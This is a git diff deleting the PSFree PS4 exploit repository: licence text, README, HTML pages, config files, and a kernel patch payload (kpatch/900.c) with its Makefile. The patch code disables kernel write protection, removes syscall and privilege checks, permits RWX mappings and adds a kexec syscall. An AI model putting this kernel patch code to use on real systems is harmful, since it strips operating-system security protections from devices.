modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Remote Network Interaction; Use with the GNU General Public License. - - Notwithstanding any other provision of this License, if you modify the -Program, your modified version must prominently offer all users -interacting with it remotely through a computer network (if your version -supports such interaction) an opportunity to receive the Corresponding -Source of your version by providing access to the Corresponding Source -from a network server at no charge, through some standard or customary -means of facilitating copying of software. This Corresponding Source -shall include the Corresponding Source for any work covered by version 3 -of the GNU General Public License that is incorporated pursuant to the -following paragraph. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the work with which it is combined will remain governed by version -3 of the GNU General Public License. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU Affero General Public License from time to time. Such new versions -will be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU Affero General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU Affero General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU Affero General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU Affero General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU Affero General Public License for more details. - - You should have received a copy of the GNU Affero General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If your software can interact with users remotely through a computer -network, you should also make sure that it provides a way for users to -get its source. For example, if your program is a web application, its -interface could display a "Source" link that leads users to an archive -of the code. There are many ways you could offer source, and different -solutions will be better for different programs; see section 13 for the -specific requirements. - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU AGPL, see -. diff --git a/psfree/README.md b/psfree/README.md deleted file mode 100644 index 04ffae4..0000000 --- a/psfree/README.md +++ /dev/null @@ -1,30 +0,0 @@ -# PSFree version 1.5.0 - -Lapse Kex ported to 9.00 - Still WIP - -Very fast and reliable but can KP :P - -- Needs a bin loader on Port 9020. -- Some performance Tweaks??. -- Add sysveri Patch - -PR are welcome - -PSFree is a collection of exploits for the PS4 console. The main focus of the -repo is for the PS4 but we try to make things portable to PS5. - -* Exploits - * PSFree: src/psfree.mjs - * Lapse (kernel): src/scripts/lapse.mjs - -Donation (Monero/XMR): -86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS - -# COPYRIGHT AND AUTHORS: -AGPL-3.0-or-later (see src/COPYING). This repo belongs to the group -`anonymous`. We refer to anonymous contributors as "anonymous" as well. - -# CREDITS: -* anonymous for PS4 firmware kernel dumps -* Check the appropriate files for any **extra** contributors. Unless otherwise - stated, everything here can also be credited to us. diff --git a/psfree/about.html b/psfree/about.html deleted file mode 100644 index 2fc6be3..0000000 --- a/psfree/about.html +++ /dev/null @@ -1,116 +0,0 @@ - - - - - About PSFree - - - PSFree is an exploit chain for PS4 and PS5.
- PSFree is free software. See COPYING for the copyleft information.
- PSFree's license is GNU-AGPL-3.0-or-later.
- Here is the source code of this program:
-
- HTML files:
- index.html
- about.html
- JavaScript files:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
psfree.mjsGNU-AGPL-3.0-or-laterdownload
alert.mjsGNU-AGPL-3.0-or-laterdownload
config.mjsGNU-AGPL-3.0-or-laterdownload
send.mjsGNU-AGPL-3.0-or-laterdownload
scripts/lapse.mjsGNU-AGPL-3.0-or-laterdownload
rop/800.mjsGNU-AGPL-3.0-or-laterdownload
module/chain.mjsGNU-AGPL-3.0-or-laterdownload
module/int64.mjsGNU-AGPL-3.0-or-laterdownload
module/view.mjsGNU-AGPL-3.0-or-laterdownload
module/memtools.mjsGNU-AGPL-3.0-or-laterdownload
module/utils.mjsGNU-AGPL-3.0-or-laterdownload
module/rw.mjsGNU-AGPL-3.0-or-laterdownload
module/offset.mjsGNU-AGPL-3.0-or-laterdownload
module/mem.mjsGNU-AGPL-3.0-or-laterdownload
- kpatch/ files:
- kpatch/utils.h
- kpatch/script.ld
- kpatch/Makefile
- kpatch/80x.c
- kpatch/types.h
- fonts/ files:
- fonts/README.txt
- fonts/FONTS.LICENSE
- fonts/LiberationMono-Regular.ttf
- - diff --git a/psfree/alert.mjs b/psfree/alert.mjs deleted file mode 100644 index b5a7371..0000000 --- a/psfree/alert.mjs +++ /dev/null @@ -1,52 +0,0 @@ -/* Copyright (C) 2023-2025 anonymous - -This file is part of PSFree. - -PSFree is free software: you can redistribute it and/or modify -it under the terms of the GNU Affero General Public License as -published by the Free Software Foundation, either version 3 of the -License, or (at your option) any later version. - -PSFree is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -GNU Affero General Public License for more details. - -You should have received a copy of the GNU Affero General Public License -along with this program. If not, see . */ - -// We can't just open a console on the ps4 browser, make sure the errors thrown -// by our program are alerted. - -// We don't use a custom logging function to avoid a dependency on a logging -// module since we want this file to stand alone. We don't want to copy the -// log function here either for the sake avoiding dependencies since using -// alert() is good enough. - -// We log the line and column numbers as well since some exceptions (like -// SyntaxError) do not show it in the stack trace. - -addEventListener('unhandledrejection', event => { - const reason = event.reason; - alert( - 'Unhandled rejection\n' - + `${reason}\n` - + `${reason.sourceURL}:${reason.line}:${reason.column}\n` - + `${reason.stack}` - ); -}); - -addEventListener('error', event => { - const reason = event.error; - alert( - 'Unhandled error\n' - + `${reason}\n` - + `${reason.sourceURL}:${reason.line}:${reason.column}\n` - + `${reason.stack}` - ); - return true; -}); - -// we have to dynamically import the program if we want to catch its syntax -// errors -import('./psfree.mjs'); diff --git a/psfree/cache.html b/psfree/cache.html deleted file mode 100644 index 2ce7382..0000000 --- a/psfree/cache.html +++ /dev/null @@ -1,23 +0,0 @@ - - -PSFree-Lapse Exploit For PS4 9.00 - - - - - -
- - \ No newline at end of file diff --git a/psfree/config.mjs b/psfree/config.mjs deleted file mode 100644 index 60325c8..0000000 --- a/psfree/config.mjs +++ /dev/null @@ -1,70 +0,0 @@ -/* Copyright (C) 2023-2025 anonymous - -This file is part of PSFree. - -PSFree is free software: you can redistribute it and/or modify -it under the terms of the GNU Affero General Public License as -published by the Free Software Foundation, either version 3 of the -License, or (at your option) any later version. - -PSFree is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -GNU Affero General Public License for more details. - -You should have received a copy of the GNU Affero General Public License -along with this program. If not, see . */ - -// webkitgtk 2.34.4 was used to develop the portable parts of the exploit -// before moving on to ps4 8.03 -// -// webkitgtk 2.34.4 was built with cmake variable ENABLE_JIT=OFF, that variable -// can affect the size of SerializedScriptValue -// -// this target is no longer supported - -// target firmware format used by PSFree -// -// 0xC_MM_mm -// -// * C console - PS4 (0) or PS5 (1) (1 bit) -// * MM major version - integer part of the firmware version (8 bits) -// * mm minor version - fractional part of the firmware version (8 bits) -// -// examples: -// * PS4 10.00 -> C = 0 MM = 10 mm = 0 -> 0x0_10_00 -// * PS5 4.51 -> C = 1 MM = 4 mm = 51 -> 0x1_04_51 - -// check if value is in Binary Coded Decimal format -// assumes integer and is in the range [0, 0xffff] -function check_bcd(value) { - for (let i = 0; i <= 12; i += 4) { - const nibble = (value >>> i) & 0xf; - - if (nibble > 9) { - return false; - } - } - - return true; -} - -export function set_target(value) { - if (!Number.isInteger(value)) { - throw TypeError(`value not an integer: ${value}`); - } - - if (value >= 0x20000 || value < 0) { - throw RangeError(`value >= 0x20000 or value < 0: ${value}`); - } - - const version = value & 0xffff; - if (!check_bcd(version)) { - throw RangeError(`value & 0xffff not in BCD format ${version}`); - } - - target = value; -} - -export let target = null; -set_target(0x900); diff --git a/psfree/fonts/FONTS.LICENSE b/psfree/fonts/FONTS.LICENSE deleted file mode 100644 index 94475dd..0000000 --- a/psfree/fonts/FONTS.LICENSE +++ /dev/null @@ -1,101 +0,0 @@ -Digitized data copyright (c) 2010 Google Corporation - with Reserved Font Arimo, Tinos and Cousine. -Copyright (c) 2012 Red Hat, Inc. - with Reserved Font Name Liberation. - -This Font Software is licensed under the SIL Open Font License, -Version 1.1. - -This license is copied below, and is also available with a FAQ at: -http://scripts.sil.org/OFL - -SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 - -PREAMBLE The goals of the Open Font License (OFL) are to stimulate -worldwide development of collaborative font projects, to support the font -creation efforts of academic and linguistic communities, and to provide -a free and open framework in which fonts may be shared and improved in -partnership with others. - -The OFL allows the licensed fonts to be used, studied, modified and -redistributed freely as long as they are not sold by themselves. -The fonts, including any derivative works, can be bundled, embedded, -redistributed and/or sold with any software provided that any reserved -names are not used by derivative works. The fonts and derivatives, -however, cannot be released under any other type of license. The -requirement for fonts to remain under this license does not apply to -any document created using the fonts or their derivatives. - - - -DEFINITIONS -"Font Software" refers to the set of files released by the Copyright -Holder(s) under this license and clearly marked as such. -This may include source files, build scripts and documentation. - -"Reserved Font Name" refers to any names specified as such after the -copyright statement(s). - -"Original Version" refers to the collection of Font Software components -as distributed by the Copyright Holder(s). - -"Modified Version" refers to any derivative made by adding to, deleting, -or substituting ? in part or in whole ? -any of the components of the Original Version, by changing formats or -by porting the Font Software to a new environment. - -"Author" refers to any designer, engineer, programmer, technical writer -or other person who contributed to the Font Software. - - -PERMISSION & CONDITIONS - -Permission is hereby granted, free of charge, to any person obtaining a -copy of the Font Software, to use, study, copy, merge, embed, modify, -redistribute, and sell modified and unmodified copies of the Font -Software, subject to the following conditions: - -1) Neither the Font Software nor any of its individual components,in - Original or Modified Versions, may be sold by itself. - -2) Original or Modified Versions of the Font Software may be bundled, - redistributed and/or sold with any software, provided that each copy - contains the above copyright notice and this license. These can be - included either as stand-alone text files, human-readable headers or - in the appropriate machine-readable metadata fields within text or - binary files as long as those fields can be easily viewed by the user. - -3) No Modified Version of the Font Software may use the Reserved Font - Name(s) unless explicit written permission is granted by the - corresponding Copyright Holder. This restriction only applies to the - primary font name as presented to the users. - -4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font - Software shall not be used to promote, endorse or advertise any - Modified Version, except to acknowledge the contribution(s) of the - Copyright Holder(s) and the Author(s) or with their explicit written - permission. - -5) The Font Software, modified or unmodified, in part or in whole, must - be distributed entirely under this license, and must not be distributed - under any other license. The requirement for fonts to remain under - this license does not apply to any document created using the Font - Software. - - - -TERMINATION -This license becomes null and void if any of the above conditions are not met. - - - -DISCLAIMER -THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT -OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE -COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL -DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER -DEALINGS IN THE FONT SOFTWARE. diff --git a/psfree/fonts/LiberationMono-Regular.ttf b/psfree/fonts/LiberationMono-Regular.ttf deleted file mode 100644 index d91164d..0000000 Binary files a/psfree/fonts/LiberationMono-Regular.ttf and /dev/null differ diff --git a/psfree/fonts/README.txt b/psfree/fonts/README.txt deleted file mode 100644 index 067f156..0000000 --- a/psfree/fonts/README.txt +++ /dev/null @@ -1,3 +0,0 @@ -git: https://github.com/liberationfonts/liberation-fonts.git - -See FONTS.LICENSE for the license. diff --git a/psfree/index.html b/psfree/index.html deleted file mode 100644 index 3ca4a11..0000000 --- a/psfree/index.html +++ /dev/null @@ -1,48 +0,0 @@ - - - - - PSFree-Lapse Exploit For PS4 9.00 - - - - - PSFree: A PS4/PS5 Exploit Chain
- Donation (Monero/XMR):
- 86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS
- See JavaScript license information for the - source code and license.
- 

-    
-    
-    
-
diff --git a/psfree/kpatch/900.c b/psfree/kpatch/900.c
deleted file mode 100644
index 73e5589..0000000
--- a/psfree/kpatch/900.c
+++ /dev/null
@@ -1,183 +0,0 @@
-/* Copyright (C) 2024-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// 9.00
-
-#include 
-
-#include "types.h"
-#include "utils.h"
-
-struct kexec_args {
-    u64 entry;
-    u64 arg1;
-    u64 arg2;
-    u64 arg3;
-    u64 arg4;
-    u64 arg5;
-};
-
-void do_patch(void);
-void restore(struct kexec_args *uap);
-
-__attribute__((section (".text.start")))
-int kpatch(void *td, struct kexec_args *uap) {
-    do_patch();
-    restore(uap);
-    return 0;
-}
-
-void restore(struct kexec_args *uap) {
-    u8 *pipe = uap->arg1;
-    u8 *pipebuf = uap->arg2;
-    for (size_t i = 0; i < 0x18; i++) {
-        pipe[i] = pipebuf[i];
-    }
-    u64 *pktinfo_field = uap->arg3;
-    *pktinfo_field = 0;
-    u64 *pktinfo_field2 = uap->arg4;
-    *pktinfo_field2 = 0;
-}
-
-void do_patch(void) {
-    // offset to fast_syscall()
-    const size_t off_fast_syscall = 0x1c0;
-    void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;
-
-    disable_cr0_wp();
-
-    // patch amd64_syscall() to allow calling syscalls everywhere
-
-    // struct syscall_args sa; // initialized already
-    // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
-    // int is_invalid_syscall = 0
-    //
-    // // check the calling code if it looks like one of the syscall stubs at a
-    // // libkernel library and check if the syscall number correponds to the
-    // // proper stub
-    // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
-    //     || sa.code != (u32)(code >> 0x10)
-    // ) {
-    //     // patch this to " = 0" instead
-    //     is_invalid_syscall = -1;
-    // }
-    write32(kbase, 0x490, 0);
-    // these code corresponds to the check that ensures that the caller's
-    // instruction pointer is inside the libkernel library's memory range
-    //
-    // // patch the check to always go to the "goto do_syscall;" line
-    // void *code = td->td_frame->tf_rip;
-    // if (libkernel->start <= code && code < libkernel->end
-    //     && is_invalid_syscall == 0
-    // ) {
-    //     goto do_syscall;
-    // }
-    //
-    // do_syscall:
-    //     ...
-    //     lea     rsi, [rbp - 0x78]
-    //     mov     rdi, rbx
-    //     mov     rax, qword [rbp - 0x80]
-    //     call    qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
-    //
-    // sy_call() is the function that will execute the requested syscall.
-    write16(kbase, 0x4b5, 0x9090);
-    write16(kbase, 0x4b9, 0x9090);
-    write8(kbase, 0x4c2, 0xeb);
-
-    // patch sys_mmap() to allow rwx mappings
-
-    // patch maximum cpu mem protection: 0x33 -> 0x37
-    // the ps4 added custom protections for their gpu memory accesses
-    // GPU X: 0x8 R: 0x10 W: 0x20
-    // that's why you see other bits set
-    // ref: https://cturt.github.io/ps4-2.html
-    write8(kbase, 0x16632a, 0x37);
-    write8(kbase, 0x16632d, 0x37);
-
-    // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
-    //
-    // this check is skipped after the patch
-    //
-    // if ((new_prot & current->max_protection) != new_prot) {
-    //     vm_map_unlock(map);
-    //     return (KERN_PROTECTION_FAILURE);
-    // }
-    write32(kbase, 0x80b8d, 0);
-
-    // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
-
-    // call    ...
-    // mov     r14, qword [rbp - 0xad0]
-    // cmp     eax, 0x4000000
-    // jb      ... ; patch jb to jmp
-    write8(kbase, 0x23b67f, 0xeb);
-    // patch called function to always return 0
-    //
-    // sys_dynlib_dlsym:
-    //     ...
-    //     mov     edi, 0x10 ; 16
-    //     call    patched_function ; kernel_base + 0x951c0
-    //     test    eax, eax
-    //     je      ...
-    //     mov     rax, qword [rbp - 0xad8]
-    //     ...
-    // patched_function: ; patch to "xor eax, eax; ret"
-    //     push    rbp
-    //     mov     rbp, rsp
-    //     ...
-    write32(kbase, 0x221b40, 0xc3c03148);
-
-    // patch sys_setuid() to allow freely changing the effective user ID
-
-    // ; PRIV_CRED_SETUID = 50
-    // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
-    // test eax, eax
-    // je ... ; patch je to jmp
-    write8(kbase, 0x1a06, 0xeb);
-
-    // overwrite the entry of syscall 11 (unimplemented) in sysent
-    //
-    // struct args {
-    //     u64 rdi;
-    //     u64 rsi;
-    //     u64 rdx;
-    //     u64 rcx;
-    //     u64 r8;
-    //     u64 r9;
-    // };
-    //
-    // int sys_kexec(struct thread td, struct args *uap) {
-    //     asm("jmp qword ptr [rsi]");
-    // }
-
-    // sysent[11]
-    const size_t offset_sysent_11 = 0x1100520;
-    // .sy_narg = 6
-    write32(kbase, offset_sysent_11, 6);
-    // .sy_call = gadgets['jmp qword ptr [rsi]']
-    write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
-    // .sy_thrcnt = SY_THR_STATIC
-    write32(kbase, offset_sysent_11 + 0x2c, 1);
-
-    //veriPatch
-    const size_t KERNEL_veriPatch = 0x626874;
-
-    write16(kbase, KERNEL_veriPatch, 0x9090);
-
-    enable_cr0_wp();
-}
diff --git a/psfree/kpatch/900.d b/psfree/kpatch/900.d
deleted file mode 100644
index 96d04e3..0000000
--- a/psfree/kpatch/900.d
+++ /dev/null
@@ -1 +0,0 @@
-900.o 900.d : 900.c types.h utils.h
diff --git a/psfree/kpatch/900.elf b/psfree/kpatch/900.elf
deleted file mode 100644
index db765a0..0000000
Binary files a/psfree/kpatch/900.elf and /dev/null differ
diff --git a/psfree/kpatch/900.o b/psfree/kpatch/900.o
deleted file mode 100644
index 8e75a49..0000000
Binary files a/psfree/kpatch/900.o and /dev/null differ
diff --git a/psfree/kpatch/Makefile b/psfree/kpatch/Makefile
deleted file mode 100644
index 59e406e..0000000
--- a/psfree/kpatch/Makefile
+++ /dev/null
@@ -1,27 +0,0 @@
-TARGET = 900
-ENTRY = 0x900000000
-src = $(TARGET).c
-
-CC = gcc
-CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
-CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
-CFLAGS += -fwrapv-pointer -std=gnu11
-
-.PHONY: all
-all: $(TARGET).elf
-
-$(TARGET).elf: $(TARGET).o
-	$(CC) $(TARGET).o -o $(TARGET).elf $(CFLAGS)
-
-.PHONY: clean
-clean:
-	-rm -f *.d *.o *.elf
-
-%.d: %.c
-	@set -e; \
-	rm -f $@; \
-	$(CC) -MM $(CPPFLAGS) $< > $@.$$$$; \
-	sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; \
